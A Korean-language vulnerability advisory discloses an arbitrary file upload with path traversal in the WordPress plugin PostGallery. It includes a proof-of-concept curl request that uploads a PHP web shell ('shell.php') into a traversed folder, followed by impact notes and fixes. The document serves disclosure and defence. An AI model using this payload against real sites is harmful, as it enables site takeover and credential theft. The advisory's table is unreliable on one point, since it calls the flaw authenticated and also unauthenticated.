
Disclosure for CVE-2025-13543
CVE-2025-13543 공개
이 저장소는 rtowebsites가 개발한 WordPress 플러그인 PostGallery <= 1.12.5에서 발견된 취약점을 공개합니다.
| CVE ID | 유형 | 구성 요소 | 영향 |
|---|---|---|---|
| CVE-2025-13543 | 인증된 (구독자 이상) 임의 파일 업로드 | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | 인증되지 않은 공격자가 임의 파일을 업로드할 수 있음 |
postgalleryAjaxUpload) 및 PostGalleryUploader 백엔드curl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php 및 데이터베이스 자격 증명 유출, 지속적인 백도어 배포, 악성 관리자 계정 생성 등 전체 사이트가 손상될 수 있습니다.lib/ajax-actions/imageUpload.php에서 적절한 권한 부여(예: current_user_can('upload_files') 필요)를 적용하고 업로드 처리 전에 암호화 nonce를 검증합니다.admin/PostGalleryUploader.php에서 uploadFolder를 wp-content/uploads/gallery의 알려진 하위 디렉토리로 엄격히 제한하고 ../ 또는 절대 경로를 포함하는 값을 거부하며 사용 전에 경로를 정규화합니다.wp_handle_upload() / wp_check_filetype_and_ext())를 사용하고 업로드를 실행 불가능한 미디어 유형의 허용 목록으로 제한하며 웹 접근 가능 디렉토리에서 .php 및 기타 실행 가능한 확장자를 명시적으로 차단합니다.이런 CTF 같은 취약점이 존재하다니... 생각했다. 임의 파일 업로드만으로도 위험한데, 디렉토리 트래버설까지 있다는 절망. 취약점 재현이 매우 재미있었다.
이름: MooseLove
역할: 독립 보안 연구원 / 버그 헌터
연락처: 요청 시 제공
본 권고는 공공 보안 인식을 위해 제공됩니다. 출처를 밝히고 자유롭게 공유할 수 있습니다.